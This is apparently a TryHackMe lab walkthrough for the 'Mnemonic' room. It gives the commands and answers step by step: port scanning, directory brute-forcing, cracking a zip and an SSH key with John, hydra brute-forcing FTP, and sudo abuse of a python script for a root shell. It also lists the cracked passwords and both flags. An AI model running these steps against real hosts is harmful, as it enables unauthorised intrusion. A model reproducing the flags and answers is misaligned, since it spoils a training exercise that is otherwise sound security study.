Mnemonic
https://tryhackme.com/room/mnemonic
Mnemonic
No answer needed
Enumerate
How many open ports?
nmap -sC -sV -T5 -p1-65535 10.10.109.236
3
What is the ssh port number?
1337
What is the name of the secret file?
gobuster dir -u http://10.10.109.236 -w /usr/share/dirb/wordlists/common.txt
gobuster dir -u http://10.10.109.236 -w big.txt -x php,txt,html -t 50
gobuster dir -u http://10.10.109.236/webmasters/ -w big.txt -x php,txt,html -t 50
gobuster dir -u http://10.10.109.236/webmasters/admin/ -w big.txt -x php,txt,html -t 50
gobuster dir -u http://10.10.109.236/webmasters/backups -w /usr/share/dirb/wordlists/common.txt -x sql,php,txt,css,zip,csv,dat,dbf,log,mdb,sav,tar,xml,cgi
backups.zip
Credentials
zip2john backups.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt
unzip backups.zip
00385007
cat backups/note.txt
ftp user name?
hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.109.236 -t 50 ftpuser
ftp password?
love4ever
What is the ssh username?
james
What is the ssh password?
chmod 600 id_rsa
ssh -i id_rsa james@10.10.109.236
python3 /usr/share/john/ssh2john.py id_rsa > john_ssh.txt
john --wordlist=/usr/share/wordlists/rockyou.txt john_ssh.txt
bluelove
What is the condor password?
ssh james@10.10.109.239 -p 1337
git clone https://github.com/MustafaTanguner/Mnemonic
cd Mnemonic/
python3 -m pip install --user colored
python3 -m pip install --user opencv-python
python3 Mnemonic.py
/root/mnemonic/maxresdefault.jpg
2
/root/mnemonic/6450.txt
pasificbell1981
Hack the machine
user.txt
THM{a5f82a00e2feee3465249b855be71c01}
root.txt
ssh -p 1337 condor@10.10.109.239
sudo -l
sudo /usr/bin/python3 /bin/examplecode.py
0
.
/bin/bash
THM{2a4825f50b0c16636984b448669b0586}
Last updated
Was this helpful?